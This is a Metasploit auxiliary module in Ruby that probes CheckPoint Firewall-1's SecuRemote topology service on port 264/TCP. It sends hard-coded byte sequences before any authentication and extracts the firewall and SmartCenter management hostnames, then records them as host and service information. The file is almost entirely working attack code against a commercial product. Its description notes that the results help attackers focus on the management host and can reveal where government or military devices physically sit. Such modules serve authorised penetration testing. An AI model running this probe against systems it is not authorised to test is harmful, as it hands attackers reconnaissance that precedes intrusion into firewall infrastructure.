1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
15
        'Description' => %q{
16
          This module sends a query to the port 264/TCP on CheckPoint Firewall-1
17
          firewalls to obtain the firewall name and management station
18
          (such as SmartCenter) name via a pre-authentication request. The string
19
          returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
20
          host. Whilst considered "public" information, the majority of installations
21
          use detailed hostnames which may aid an attacker in focusing on compromising
22
          the SmartCenter host, or useful for government, intelligence and military
23
          networks where the hostname reveals the physical location and rack number
24
          of the device, which may be unintentionally published to the world.
25
        },
26
        'Author' => [ 'aushack' ],
27
        'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
28
        'References' => [
29
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
30
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
31
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
32
        ],
33
        'Notes' => {
34
          'Reliability' => UNKNOWN_RELIABILITY,
35
          'Stability' => UNKNOWN_STABILITY,
36
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
37
        }
38
      )
39
    )
40

41
    register_options(
42
      [
43
        Opt::RPORT(264),
44
      ]
45
    )
46
  end
47

48
  def autofilter
49
    false
50
  end
51

52
  def run
53
    print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
54
    fw_hostname = nil
55
    sc_hostname = nil
56

57
    connect
58

59
    sock.put("\x51\x00\x00\x00")
60
    sock.put("\x00\x00\x00\x21")
61
    res = sock.get_once(4)
62
    if (res and res == "Y\x00\x00\x00")
63
      print_good("Appears to be a CheckPoint Firewall...")
64
      sock.put("\x00\x00\x00\x0bsecuremote\x00")
65
      res = sock.get_once
66
      if (res and res =~ /CN=(.+),O=(.+)\./i)
67
        fw_hostname = $1
68
        sc_hostname = $2
69
        print_good("Firewall Host: #{fw_hostname}")
70
        print_good("SmartCenter Host: #{sc_hostname}")
71
      end
72
    else
73
      print_error("Unexpected response: '#{res.inspect}'")
74
    end
75

76
    report_info(fw_hostname, sc_hostname)
77

78
    disconnect
79
  end
80

81
  # Only trust that it's real if we have a hostname. If you get a funny
82
  # response, it might not be what we think it is.
83
  def report_info(fw_hostname, sc_hostname)
84
    return unless fw_hostname
85

86
    host_info = {
87
      :host => datastore['RHOST'],
88
      :os_name => "Checkpoint Firewall-1",
89
      :purpose => "firewall"
90
    }
91
    host_info[:name] = fw_hostname
92
    host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
93
    report_host(host_info)
94
    svc_info = {
95
      :host => datastore['RHOST'],
96
      :port => datastore['RPORT'],
97
      :proto => "tcp",
98
      :name => "securemote"
99
    }
100
    report_service(svc_info)
101
  end
102
end
103

104